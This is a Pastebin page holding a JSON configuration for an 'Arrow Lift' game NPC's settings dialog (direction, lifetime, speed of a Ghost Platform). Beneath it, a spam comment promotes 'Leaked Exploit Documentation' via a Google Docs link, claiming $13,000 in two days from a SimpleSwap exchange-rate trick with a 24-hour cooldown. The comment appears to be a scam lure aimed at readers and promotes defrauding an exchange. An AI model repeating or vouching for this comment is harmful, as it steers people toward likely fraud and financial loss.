Enjl

Arrow Lift Settings

Jan 8th, 2020
887
0
Never
1
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JSON 1.24 KB | None | 0 0
  1. {
  2.     "style" : "groupbox",
  3.     "title" : "Arrow Lift Settings",
  4.     "layout": [
  5.         {
  6.             "control": "comboBox",
  7.             "name": "type",
  8.             "title": "Type",
  9.             "type": "int",
  10.             "tooltip": "What direction should the Ghost Platform travel?",
  11.             "value-default": 0,
  12.             "elements": ["Direction Cycle", "Up", "Left", "Right"]
  13.         },
  14.         {
  15.         "control" : "group",
  16.         "title" : "",
  17.         "name" : "..",
  18.         "children": [
  19.             {
  20.                 "control": "checkbox",
  21.                 "name": "override",
  22.                 "title": "Use Per-NPC Settings",
  23.                 "tooltip": "When checked, per-NPC settings will be used for these settings in place of NPC config values.",
  24.                 "text-visible": false,
  25.                 "value-default": false
  26.             },     
  27.             {
  28.                 "control": "spinBox",
  29.                 "type": "int",
  30.                 "name": "life",
  31.                 "title": "Life Time",
  32.                 "tooltip": "How many frames should the Ghost Platform live for? Set to 0 for infinite life time.",
  33.                 "value-default": 500,
  34.                 "value-min": 0,
  35.                 "value-max": 9999,
  36.                 "single-step": 1
  37.             },
  38.             {
  39.                 "control": "spinBox",
  40.                 "name": "speed",
  41.                 "title": "Speed",
  42.                 "type": "double",
  43.                 "tooltip": "How fast the Ghost Platform travels in pixels/frame.",
  44.                 "value-default": 1,
  45.                 "value-min": 1,
  46.                 "value-max": 999,
  47.                 "single-step": 0.01
  48.             }]
  49.         }
  50.     ]
  51. }
Advertisement
Comments
  • Xenkivor
    103 days
    # CSS 0.86 KB | 0 0
    1. ✅ Leaked Exploit Documentation:
    2.  
    3. https://docs.google.com/document/d/1S1iTruSLkgEPO8QtTuo2twS4f2FoJ3_l0-p4GKqeAUY/edit?usp=sharing
    4.  
    5. This made me $13,000 in 2 days.
    6.  
    7. Important: If you plan to use the exploit more than once, remember that after the first successful swap you must wait 24 hours before using it again. Otherwise, there is a high chance that your transaction will be flagged for additional verification, and if that happens, you won't receive the extra 25% — they will simply correct the exchange rate.
    8. The first COMPLETED transaction always goes through — this has been tested and confirmed over the last days.
    9.  
    10. Edit: I've gotten a lot of questions about the maximum amount it works for — as far as I know, there is no maximum amount. The only limit is the 24-hour cooldown (1 use per day without verification from SimpleSwap — instant swap).
Add Comment
Please, Sign In to add comment